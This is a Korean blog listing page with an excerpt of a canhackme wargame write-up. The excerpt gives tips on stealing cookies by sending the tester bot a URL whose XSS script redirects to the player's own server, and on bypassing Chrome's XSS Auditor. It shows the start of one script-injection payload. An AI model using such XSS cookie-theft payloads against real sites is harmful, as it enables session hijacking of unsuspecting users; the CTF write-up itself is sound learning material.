Limelee

  • 홈
  • 태그
  • 방명록

wargame/canhackme 1

canhackme

canhackmeMisc 문제 1, Server-Side 문제 4, XSS 문제 10XSS 문제 팁문제 안에는 아무런 힌트가 존재하지 않고 어떤 류의 문제인지는 문제 설명페이지 오른쪽 하단 해쉬태그 형식으로만 알려준다. 문제의 목적이 대체로 불친절하므로 삽질했던 부분에 대해 적어둔다. 1. 자신의 서버로 이동하는 XSS 스크립트가 담긴 url을 tester페이지에 요청하면 쿠키를 확인 가능하다.2. tester페이지가 사용하는 Google Chrome 68.0.3440.75. 에는 Chrome Auditor 라는 XSS 필터링이 존재하므로 XSS 필터링 우회가 반드시 필요하다. 문제 PayloadJSONhttps://json.canhack.me/?%3Cscript%3E=;document.location=..

wargame/canhackme 2019.12.30
1
더보기

공지사항

  • 작성된 게시글의 내용을 악의적인 목적으로 이용할 시, 발생할 수 있는 법적 책임은 본인에게 있습니다.
  • 분류 전체보기 (77) N
    • wargame (49)
      • canhackme (1)
      • Lord Of Buffer overflow (4)
      • Lord Of SQL Injection (24)
      • wargame.kr (6)
      • webhacking.kr (12)
      • etc (2)
    • Raspberry Pi (8)
    • Server (5)
    • Web,Mobile (15) N
      • Tool (9) N
      • Tech (6)
    • Private (0)

Tag

lob, webhacking.kr, apktool, Los, apache, vulhub, Windows, OpenSSL, Python, Frida, burpsuite, Mobile, webhacking, WarGame, mysql,

최근글과 인기글

  • 최근글
  • 인기글

최근댓글

페이스북 트위터 플러그인

  • Facebook
  • Twitter

방문자수Total

  • Today :
  • Yesterday :

Copyright © Kakao Corp. All rights reserved.

  • Jmoon
  • Kmon
  • Pororiri
  • Do9dark
  • Nisam
  • 핵포리
  • Prestige
  • Universe

티스토리툴바